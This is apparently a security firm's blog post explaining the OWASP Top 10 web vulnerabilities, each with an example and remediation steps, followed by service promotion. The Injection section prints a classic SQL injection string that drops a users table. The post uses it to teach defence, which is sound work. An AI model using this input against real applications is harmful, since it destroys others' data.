12 Jun 2025

OWASP Top 10 Common Vulnerabilities!

Cybersecurity is crucial for protecting your apps and users, but it can feel overwhelming sometimes.

OWASP (Open Web Application Security Project) is a nonprofit foundation that works to improve the security of software. It’s best known for producing free and open resources focused on web application security, helping organisations and developers understand, identify, and fix vulnerabilities in their software.

The OWASP Top 10 is a list of the most common and critical web application vulnerabilities that every developer, tester, and business should understand.  We have compiled the top 10 with a simple explanation on what the terminology means, an example of the issue and also how to remediate it below.
 

Broken Access Control

What it means = Users can access data or features they shouldn’t.

Example = Changing a user ID in the URL (e.g., /account/123) lets someone view other user’s private data.

Remediation :

• Enforce server-side checks for every request.
• Use proper authorisation logic, never rely on hiding links or buttons.
• Apply “least privilege” so users only get access to what they need.

Cryptographic Failures

What it means = Sensitive data isn’t properly protected.

Example = Storing passwords in plain text instead of hashing them.

Remediation :

• Use strong, modern encryption (e.g., TLS 1.2+).
• Hash passwords with bcrypt or Argon2, never plain text.
• Don’t roll your own cryptography, use proven libraries.

Injection

What it means = Attackers send malicious data that tricks your app into doing unintended things.

Example = Entering '; DROP TABLE users; -- into a form deletes all users.

Remediation :

• Use parameterized queries or ORM frameworks (e.g., prepared statements).
• Validate and sanitise all user input.
• Avoid string concatenation to build queries.

Insecure Design

What it means = The app’s overall design doesn’t consider security from the start.

Example = Allowing file uploads without validating file types or size.

Remediation :

• Threat-model your app early in development.
• Apply secure design patterns like input validation and authentication.
• Consider abuse cases (how might an attacker misuse a feature?).

Security Misconfiguration

What it means = Using default settings or unnecessary features that expose your app.

Example = Leaving admin consoles open or using default passwords.

Remediation :

• Harden all environments (development, staging, production).
• Disable unused features.
• Regularly review and update configurations.

Vulnerable and Outdated Components

What it means = Using old libraries or frameworks with known vulnerabilities.

Example = Using an outdated version of a plugin that’s been hacked before.

Remediation :

• Track and update dependencies regularly.
• Subscribe to security bulletins.
• Use tools like Dependabot or Snyk to automate checks.

Identification and Authentication Failures

What it means = Weaknesses in login systems.

Example = No limit on failed logins, making brute-force attacks easy.

Remediation :

• Implement account lockouts or CAPTCHA after failed attempts.
• Use multi-factor authentication (MFA).
• Don’t rely on default or weak passwords.

Software and Data Integrity Failures

What it means = Failing to verify the integrity of code or data.

Example = Allowing unsigned or tampered software updates.

Remediation :

• Use code signing for updates.
• Validate integrity checksums (e.g., SHA-256) before installing dependencies.
• Store sensitive config data securely.

Security Logging and Monitoring Failures

What it means = Not detecting or responding to attacks.

Example = No logs for failed login attempts or suspicious API calls.

Remediation :

• Implement logging for critical events (logins, errors, data access).
• Monitor logs with alerting systems (e.g., SIEM).
• Establish an incident response plan.

Server-Side Request Forgery (SSRF)

What it means = Attackers trick your server into making requests to internal systems or other services.

Example = Submitting a crafted URL that forces the app to fetch data from internal resources (like AWS metadata).

Remediation :

• Validate and sanitise URLs and user-supplied data.
• Use allowlists for external requests.
• Isolate internal resources from public-facing apps.

Securing your application starts with awareness and planning. The OWASP Top 10 helps you focus on the most critical risks, so you can build trust with your users and avoid costly breaches.

Next Steps :

• Review your app for these vulnerabilities.
• Train your team on secure coding practices.
• Integrate security testing into your development pipeline.

LoughTec are cyber security experts, if you want to find out more on how LoughTec can help protect your business in many ways, see some further recommended information and options below.
 

Click to find out more about how much a cyber attack could potentially cost your business. 

Click to find out more about Security Operations Centre SOC 24-7-365 protection.

Click to find out more about Staff Cyber Security Awareness Training.

Click to find out more about Ransomware Protection.

You can also see more about us in our case studies and testimonials sections.